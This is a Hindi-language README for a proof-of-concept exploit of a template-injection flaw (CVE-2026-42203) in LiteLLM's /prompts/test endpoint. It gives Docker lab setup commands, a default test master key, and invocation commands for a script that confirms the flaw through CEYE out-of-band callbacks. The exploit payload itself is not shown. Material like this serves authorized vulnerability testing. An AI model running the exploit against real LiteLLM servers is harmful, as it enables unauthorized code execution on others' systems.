
CVE-2026-42203 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, LiteLLM के /prompts/test एंडपॉइंट में SSTI भेद्यता, अधिकृत परीक्षण के लिए CEYE कॉलबैक सत्यापन के साथ।
यह दस्तावेज़ बताता है कि स्थानीय LiteLLM वातावरण कैसे शुरू करें और /prompts/test SSTI कमजोरी को सत्यापित करने के लिए CVE-2026-42203.py निष्पादित करें।
केवल अपने अधिकृत स्थानीय प्रयोग वातावरण में उपयोग करें। स्क्रिप्ट को अनधिकृत सार्वजनिक लक्ष्यों पर इंगित न करें।
Lab निर्देशिका में जाएँ, LiteLLM, Postgres और Prometheus प्रारंभ करें:
docker compose up -d
कंटेनर की स्थिति देखें:
docker compose ps
सेवा तक पहुँच की पुष्टि करें:
curl http://127.0.0.1:4000/
Master_Key डिफ़ॉल्ट रूप से: sk-master-test-key-1234
कमांड लाइन पैरामीटर के माध्यम से पास करें:
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
--auth 'sk-local-test-key' \
--ceye-domain 'your-id.ceye.io' \
--ceye-token 'your-ceye-api-token'
चर का अर्थ:
LITELLM_API_KEY:LiteLLM तक पहुँच Key, स्थानीय Docker वातावरण में आमतौर पर .env में LITELLM_MASTER_KEY से मेल खाती है।CEYE_DOMAIN:आपका CEYE उपडोमेन, उदाहरण xxxxxx.ceye.io।CEYE_TOKEN:आपका CEYE API Token, वापसी कनेक्शन रिकॉर्ड क्वेरी करने के लिए।पूर्ण उदाहरण:
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
--target http://127.0.0.1:4000 \
--auth 'sk-local-test-key' \
--ceye-domain 'your-id.ceye.io' \
--ceye-token 'your-ceye-api-token'
मुख्य पैरामीटर:
--target:LiteLLM सेवा पता, डिफ़ॉल्ट http://127.0.0.1:4000 है।--auth / --api-key:/prompts/test कॉल करने के लिए उपयोग की जाने वाली LiteLLM Key।--ceye-domain:CEYE वापसी कनेक्शन डोमेन।--ceye-token:CEYE API Token। स्क्रिप्ट आउटपुट करते समय स्वचालित रूप से मास्क करके दिखाया जाता है।--wait:CEYE वापसी कनेक्शन के लिए प्रतीक्षा सेकंड, डिफ़ॉल्ट 20।--interval:CEYE रिकॉर्ड पोलिंग अंतराल सेकंड, डिफ़ॉल्ट 3।--timeout:HTTP अनुरोध टाइमआउट, डिफ़ॉल्ट 10 सेकंड।--insecure:लक्ष्य स्व-हस्ताक्षरित HTTPS प्रमाणपत्र होने पर यह पैरामीटर जोड़ें, TLS प्रमाणपत्र सत्यापन अक्षम करें।यदि CEYE को वापसी कनेक्शन प्राप्त होता है, तो स्क्रिप्ट आउटपुट करेगी:
[VULNERABLE] CEYE received the callback request.
यदि प्रतीक्षा अवधि के भीतर कोई वापसी कनेक्शन प्राप्त नहीं होता है, तो स्क्रिप्ट आउटपुट करेगी:
[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.